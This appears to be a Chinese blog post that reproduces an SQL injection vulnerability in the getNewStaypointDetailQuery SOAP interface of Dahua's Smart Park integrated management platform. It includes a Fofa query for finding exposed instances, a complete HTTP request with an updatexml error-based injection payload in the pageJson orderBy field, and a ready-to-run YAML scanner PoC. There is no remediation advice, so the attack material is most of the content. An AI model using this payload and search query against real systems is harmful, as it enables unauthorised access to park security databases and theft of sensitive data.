Advertisement

大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入

阅读量:

简介

大华智慧园区解决方案通过加载AI技术实现园区安防与办公应用的智慧化升级,显著提升了企业的安全水平和办公效能;该方案深入拓展至各类业务场景,通过人、车、物数据的线上融合与计算,为企业提供全方位的数据支持,助力园区实现智能化管理;通过构建园区大数据平台,整合收集各类业务子系统数据,为企业提供全维度的数据分析能力与决策支持,实现了对事件的有效监控与全面管理;从而帮助企业加速数字化转型进程,显著提升了安全水平、运营效能以及管理效能

漏洞简介

在大华智慧园区综合管理平台的getNewStaypointDetailQuery接口处,默认未对用户的输入进行有效的过滤,在未经安全验证的字符串被直接注入到该SQL查询语句中时会引发严重的安全风险问题。这种情况下潜在的远程未授权攻击者可以通过该漏洞获取目标系统的敏感信息,并进一步利用这些信息非法获取目标系统的权限。

影响范围

大华智慧园区综合管理平台
Fofa:

复制代码 
    app="dahua-智慧园区综合管理平台"

漏洞复现

复制代码 
 POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1

    
 Host: 
    
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
    
 Content-Type: text/xml;charset=UTF-8
    
 Content-Length: 495
    
  
    
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
    
 <soapenv:Header/>
    
 <soapenv:Body>
    
 <car:getNewStaypointDetailQuery>
    
 <!--type: string-->
    
 <searchJson>{}</searchJson>
    
 <!--type: string-->
    
 <pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"}</pageJson>
    
 <!--type: string-->
    
 <extend>quae divum incedo</extend>
    
 </car:getNewStaypointDetailQuery>
    
 </soapenv:Body>
    
 </soapenv:Envelope>

poc

复制代码 
 params: []

    
 name: 大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入
    
 set: {}
    
 rules:
    
 - method: POST
    
   path: /portal/services/carQuery/getNewStaypointDetailQuery
    
   headers:
    
     Content-Type: text/xml;charset=UTF-8
    
   body: |-
    
     <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">
    
     <soapenv:Header/>
    
     <soapenv:Body>
    
     <car:getNewStaypointDetailQuery>
    
     <!--type: string-->
    
     <searchJson>{}</searchJson>
    
     <!--type: string-->
    
     <pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"}</pageJson>
    
     <!--type: string-->
    
     <extend>quae divum incedo</extend>
    
     </car:getNewStaypointDetailQuery>
    
     </soapenv:Body>
    
     </soapenv:Envelope>
    
   search: ""
    
   followredirects: false
    
   expression: response.status == 500 && response.body.bcontains(b"java.sql.SQLException")
    
 groups: {}
    
 detail:
    
   author: ""
    
   links: []
    
   description: ""
    
   version: ""

全部评论 (0)

还没有任何评论哟~

相关文章推荐

大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入

简介 大华智慧园区解决方案通过AI技术的加载实现园区安防与园区办公应用的智慧化升级,提升企业安全等级和办公效率;将物联网应用神经延伸至企业各种业务场景,实现人、车、物数据信息线上融合与计算,为园区智慧...

大华智慧园区综合管理平台 getNewStaypointDetailQuery SQL注入漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

【漏洞复现】大华-智慧园区综合管理平台-wpms-getNewStaypointDetailQuery-sql注入

目录 免责声明 0x01产品简介 0x02漏洞概述 0x03网络测绘 0x04漏洞复现 0x05Nuclei 0x06修复建议 免责声明 此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法...

大华智慧园区综合管理平台SQL注入漏洞

大华智慧园区综合管理平台SQL注入漏洞 一、产品简介 二、漏洞概述 三、复现环境 四、漏洞复现 burpPoC验证 查询当前用户 小龙POC检测: 五、修复建议 免责声明:请勿利用文章内的相关技术从事...

大华智慧园区综合管理平台 clientServer SQL注入漏洞

产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台searchJson SQL注入漏洞

一、漏洞简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台SQL注入漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台 clientServer SQL注入漏洞复现

0x01产品简介 “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台carQuery接口SQL注入漏洞

漏洞描述 大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

大华智慧园区综合管理平台pageJson接口SQL注入漏洞

漏洞描述 大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台未对用户...